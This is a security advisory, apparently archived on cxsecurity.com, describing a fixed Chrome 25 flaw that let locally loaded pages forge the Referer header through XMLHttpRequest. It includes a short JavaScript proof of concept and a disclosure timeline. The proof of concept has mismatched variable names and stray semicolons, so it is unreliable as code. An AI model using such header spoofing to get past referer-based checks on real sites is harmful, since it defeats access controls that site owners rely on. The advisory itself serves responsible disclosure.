Google Chrome 25.0.1364 XMLHttpRequest HTTP Referer Header Bypass

2013-07-08 / 2013-07-09
Credit: Liad Mizrachi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Advisory: XMLHttpRequest HTTP Referer Header Faking Author: Liad Mizrachi Vendor URL: http://www.chromium.org/ Vulnerability Status: Fixed Application Version: Google Chrome v25.0.1364.152 ========================== Vulnerability Description ========================== Chromium is the open source web browser project from which Google Chrome draws its source code. Chromium fails to validate the use of unsafe headers when the page is load from the local drive, allowing to set and change the referer header using "setRequestHeader" when generating a Ajax (XMLHttpRequest) request. ========================== PoC ========================== function SendReq() { var xmlhttp = new XmlHttpRequest(); xmlHttp.onreadystatechange = readyStateChanged; xmlHttp.open("GET", "http://AnySite.com/checkReferer.php";, true); xmlHttp.setRequestHeader("Referer", "http://valid.referer.com";); xmlHttp.send(); } ========================== Solution ========================== Block all scripts from setting unsafe headers in XMLHttpRequest. - Fixed by vendor. ========================== Disclosure Timeline ========================== 04-Mar-2013 - Google Security Team informed by mail. 14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open source project, please file the report directly in their bug tracker" 14-Mar-2013 - Security Bug Opened @ Chromium project. 30-Apr-2013 - Fixed.

References:

http://www.chromium.org/
https://codereview.chromium.org/13979011/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top